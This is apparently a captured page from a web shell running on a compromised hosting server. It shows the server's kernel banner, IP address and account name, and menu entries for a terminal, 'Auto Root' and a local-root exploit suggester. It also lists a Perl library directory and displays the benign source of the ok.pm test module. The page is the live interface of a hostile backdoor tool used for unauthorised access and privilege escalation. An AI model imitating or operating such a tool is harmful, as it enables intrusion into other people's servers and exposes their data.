Linux ih01.iridiumhosting.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.208
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
share /
perl5 /
5.32 /
Delete
Unzip
Name
Size
Permission
Date
Action
Alien
[ DIR ]
drwxr-xr-x
2024-07-11 18:22
App
[ DIR ]
drwxr-xr-x
2024-04-03 09:10
AppConfig
[ DIR ]
drwxr-xr-x
2024-07-11 18:22
CPAN
[ DIR ]
drwxr-xr-x
2024-04-03 09:10
Canary
[ DIR ]
drwxr-xr-x
2024-04-03 09:10
Capture
[ DIR ]
drwxr-xr-x
2024-07-11 18:22
ExtUtils
[ DIR ]
drwxr-xr-x
2024-07-11 22:40
FFI
[ DIR ]
drwxr-xr-x
2024-07-11 18:22
File
[ DIR ]
drwxr-xr-x
2024-07-11 22:40
HTTP
[ DIR ]
drwxr-xr-x
2024-04-03 09:10
IO
[ DIR ]
drwxr-xr-x
2024-07-11 18:22
POD2
[ DIR ]
drwxr-xr-x
2024-04-03 09:11
Path
[ DIR ]
drwxr-xr-x
2024-07-11 18:22
Test
[ DIR ]
drwxr-xr-x
2024-07-11 22:40
Test2
[ DIR ]
drwxr-xr-x
2024-07-11 22:40
Try
[ DIR ]
drwxr-xr-x
2024-04-03 09:11
Types
[ DIR ]
drwxr-xr-x
2024-04-03 09:10
XML
[ DIR ]
drwxr-xr-x
2024-07-11 18:22
lib
[ DIR ]
drwxr-xr-x
2024-04-03 09:11
local
[ DIR ]
drwxr-xr-x
2024-04-03 09:11
x86_64-linux-thread-multi
[ DIR ]
drwxr-xr-x
2024-04-03 09:10
AppConfig.pm
31.7
KB
-r--r--r--
2015-03-01 22:23
CPAN.pm
144.4
KB
-r--r--r--
2023-05-10 06:57
Expect.pm
98.91
KB
-r-xr-xr-x
2024-03-08 16:12
Test2.pm
6.25
KB
-r--r--r--
2024-04-25 14:05
alienfile.pm
16.48
KB
-r--r--r--
2024-06-05 21:06
cPanelUserConfig.pm
561
B
-rw-r--r--
2025-10-02 19:40
ok.pm
971
B
-r--r--r--
2024-04-25 14:05
Save
Rename
package ok; our $VERSION = '1.302199'; use strict; use Test::More (); sub import { shift; if (@_) { goto &Test::More::pass if $_[0] eq 'ok'; goto &Test::More::use_ok; } # No argument list - croak as if we are prototyped like use_ok() my (undef, $file, $line) = caller(); ($file =~ /^\(eval/) or die "Not enough arguments for 'use ok' at $file line $line\n"; } __END__ =encoding UTF-8 =head1 NAME ok - Alternative to Test::More::use_ok =head1 SYNOPSIS use ok 'Some::Module'; =head1 DESCRIPTION With this module, simply change all C<use_ok> in test scripts to C<use ok>, and they will be executed at C<BEGIN> time. Please see L<Test::use::ok> for the full description. =head1 CC0 1.0 Universal To the extent possible under law, 唐鳳 has waived all copyright and related or neighboring rights to L<Test::use::ok>. This work is published from Taiwan. L<https://creativecommons.org/publicdomain/zero/1.0/> =cut